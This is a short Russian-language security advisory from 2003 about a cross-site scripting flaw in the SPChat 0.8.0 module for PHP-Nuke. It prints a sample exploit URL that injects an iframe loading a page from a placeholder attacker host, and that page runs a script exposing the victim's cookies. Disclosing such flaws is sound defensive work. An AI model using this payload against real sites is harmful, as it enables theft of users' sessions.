Security Lab

Межсайтовый скриптинг в SPChat

Дата публикации:06.06.2003
Всего просмотров:1535
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Saarport SPChat 1.x
Описание: Уязвимость в проверке правильности ввода обнаружена в SPChat. Удаленный пользователь может выполнить XSS нападение.

XyborG сообщает, что удаленный пользователь может сконструировать специально обработанный URL, который, когда будет загружен в браузере целевого пользователя, выполнит произвольный код сценария в контексте SPChat сайта. Пример:

http://[target]/modules.php?op=modload&name=SPChat&file=index&statussess=
<IF RAME%20src="http://[attacher]/attack.htm"
где http://[attacher]/attack.htm
<script>
alert(document.cookie);
</script>
Уязвимость обнаружена в SPChat 0.8.0
Ссылки: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0